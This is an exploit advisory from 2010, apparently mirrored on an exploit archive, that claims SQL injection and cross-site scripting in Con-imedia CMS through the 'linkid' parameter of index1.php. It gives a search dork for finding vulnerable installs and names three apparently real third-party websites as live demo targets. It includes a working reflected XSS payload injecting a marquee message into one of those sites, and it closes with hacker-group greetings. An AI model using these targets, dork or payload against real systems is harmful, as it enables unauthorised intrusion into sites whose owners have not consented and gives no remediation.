Con-imedia CMS Design's SQL Injection & XSS Vulnerability

=========================================================
Con-imedia CMS Design's SQL Injection & XSS Vulnerability
=========================================================


#################################################################################################

[+] Con-imedia CMS Design's (index1.php?linkid=) SQL Injection And XSS Vulnerability

[+] By Wiro Gendenk Aka Gendenk

[+] Published: 2010-06-22 Pukul 00.00 WIB

[+] jatimcrew.org/

##################################################################################################

# Script Homepage:
# http://con-imedia.com

[+]Dork: intext:"Powered By: Con-IMedia"

[+] SQL Injection

Demo : 

http://www.airportwesthotel.com/index1.php?linkid=75


http://www.ucomgh.com/index1.php?linkid=1


http://www.gse.com.gh/index1.php?linkid=1


http://[target]/[path]/index1.php?linkid=[SQL]



[+] XSS Injection

Demo :

http://www.ucomgh.com/index1.php?linkid=%3Cmarquee%3E%3Cfont%20color=red%20size=15%3EGendenk%20bukan%20hacker%20:P%3C/font%3E%3C/marquee%3E

##################################################################################################

Life is challanging, the fear of challanges, causing you for backwardness..Facing for the bright future..

#Thanks to :

ALLAH SWT, Nabi Muhammad SAW, Almarhum Ibunda Tercinta dan Bapak Koe Tersayang..


Cyberlog, Cr4wl3r, Byz9991, DarkAvanger, Newbie_Campuz, Unixcode and MAMA Sri Rahayu [ istri cyberlog ] Semoga Cepet Sembuh..


Buat Yayank Ucrit I Love U Full :P


All Member Jatimcrew, Manadocoding, Sekuritionline.. 
##################################################################################################



#  0day.today [2018-01-05]  #